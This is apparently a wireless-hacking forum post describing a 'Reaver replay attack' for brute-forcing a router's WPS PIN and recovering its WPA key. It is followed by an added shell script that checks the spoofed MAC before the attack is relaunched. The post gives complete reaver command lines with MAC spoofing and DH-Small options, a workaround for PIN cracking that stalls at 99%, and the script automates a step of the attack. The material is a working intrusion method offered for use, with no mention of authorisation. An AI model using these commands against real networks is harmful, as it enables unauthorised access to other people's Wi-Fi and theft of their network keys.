
The Reaver DH-Small 99% Replay attack



Musket Teams developed what we term the Reaver Replay Attack for our own use. We have published this previously but have found a MAC-spoofing twist. Using a simple reaver command line did not work against the targeted router. To drag WPS pins out of the router we had to use the longer command line suggested by the author of autoreaver:

reaver -i mon0 -a -f -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -S -vv -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

The pins jumped from less than 10% up to 91%, but it still took two days to move through approximately 1000 pins. Finally, as we suspected would occur, at 99% the pins spun endlessly.


To solve the problem we used the replay attack - we ran reaver again:

reaver -i mon0 -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -vv -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

We removed the -a, the -f and the -S (use DH-Small).

Reaver asked us to restore the previous session AND WE SELECTED NO.

This started reaver with a new session BUT NOT using DH-Small.

The WPS pin fell out after a single successful pin request, HOWEVER there was no WPA key?

Confused, we ran the attack again - still no WPA key.


We checked the command line and found that the MAC address we were spoofing had not been set up properly. The MAC in the reaver command line did not match the actual spoofed MAC address. We corrected this, ran the reaver attack again (i.e. a new session without DH-Small) and bingo, both the WPA key and the WPS pin were provided. Note the MAC problem only occurred when we ran the replay. In all other sessions the MAC was correct, as we used our new version of VMR-MDK009x.sh, which will be released soon. However, the replay was done from the command line.

In short, if the WPS pin spins at 99.99%, restart the attack from the beginning and remove the -S (DH-Small). Make sure the MAC address you are spoofing in the reaver command line is the MAC address shown for the monitor interface when you type ifconfig.

We have duplicated the reaver replay attack many, many times; however, the MAC problem was something new.


Edited by musketteams
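The closing advice in the post (make sure the --mac= value given to reaver is the MAC the monitor interface actually shows) is easy to automate. The script below is an added example written for this page, not code from the post or from VMR-MDK009x.sh: it pulls the MAC out of an ifconfig or ip link listing, pulls the --mac= value out of a reaver command line, and refuses to proceed on a mismatch. The interface name mon0, the sample listings and the reaver command line are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): before launching the reaver
# replay session, confirm that the MAC in --mac= really is the MAC the
# monitor interface currently carries. mon0, the sample outputs and the
# reaver command line below are constructed placeholders.

# Normalise a MAC: lower-case, dashes to colons, first six octets only
# (old ifconfig prints monitor interfaces as UNSPEC with 16 dash-separated bytes).
normalize_mac() {
    printf '%s' "$1" | tr 'A-F' 'a-f' | tr '-' ':' | cut -c1-17
}

# MAC from `ifconfig <iface>` output; handles both the "HWaddr xx" layout
# (net-tools 1.60) and the "ether xx" layout (net-tools 2.x).
mac_from_ifconfig() {
    raw=$(printf '%s\n' "$1" | awk '
        { for (i = 1; i < NF; i++) if ($i == "HWaddr" || $i == "ether") { print $(i+1); exit } }')
    normalize_mac "$raw"
}

# MAC from `ip link show <iface>` output; the address follows the first
# "link/..." token (link/ether, or link/ieee802.11/radiotap for monitor mode).
mac_from_ip_link() {
    raw=$(printf '%s\n' "$1" | awk '$1 ~ /^link\// { print $2; exit }')
    normalize_mac "$raw"
}

# The value handed to reaver via --mac=... (empty if the option is absent).
mac_from_reaver_cmd() {
    raw=$(printf '%s\n' "$1" | tr ' ' '\n' | sed -n 's/^--mac=//p' | head -n 1)
    normalize_mac "$raw"
}

# Compare a captured interface listing with a reaver command line.
# Returns 0 on match, 1 on mismatch or when either MAC could not be found.
check_text() {
    listing=$1; cmd=$2
    case "$listing" in
        *"link/"*) actual=$(mac_from_ip_link "$listing") ;;
        *)         actual=$(mac_from_ifconfig "$listing") ;;
    esac
    wanted=$(mac_from_reaver_cmd "$cmd")
    if [ -n "$actual" ] && [ "$actual" = "$wanted" ]; then
        echo "OK: interface MAC $actual matches --mac=$wanted"
        return 0
    fi
    echo "MISMATCH: interface shows '$actual' but reaver was given --mac='$wanted'" >&2
    echo "Re-spoof the interface (e.g. macchanger -m $wanted <iface>) or fix --mac= before replaying" >&2
    return 1
}

# Live check on a real interface:  check_live mon0 "reaver ... --mac=..."
check_live() {
    if command -v ip >/dev/null 2>&1; then
        listing=$(ip link show "$1" 2>/dev/null)
    else
        listing=$(ifconfig "$1" 2>/dev/null)
    fi
    check_text "$listing" "$2"
}

# Constructed samples: the interface was re-spoofed to ...:33 while the
# command line still says ...:55 (the situation described in the post).
SAMPLE_CMD='reaver -i mon0 -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -vv -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55'
SAMPLE_IFCONFIG_OLD='mon0      Link encap:UNSPEC  HWaddr 00-C0-CA-11-22-33-00-00-00-00-00-00-00-00-00-00'
SAMPLE_IP_LINK='5: mon0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN mode DEFAULT qlen 1000
    link/ieee802.11/radiotap 00:11:22:33:44:55 brd ff:ff:ff:ff:ff:ff'

# Run the live check only when invoked with an interface and a command line,
# e.g.  sh check_mac.sh mon0 "$SAMPLE_CMD" && eval "$SAMPLE_CMD"
if [ $# -ge 2 ]; then
    check_live "$1" "$2"
fi
```

Gate the replay on the check (`check_live mon0 "$CMD" && eval "$CMD"`) so a stale --mac= value cannot produce the "pin but no WPA key" session the post describes; the helpers accept both the old HWaddr and the newer ether/ip link layouts, so the same script works on older and current Kali/BackTrack images.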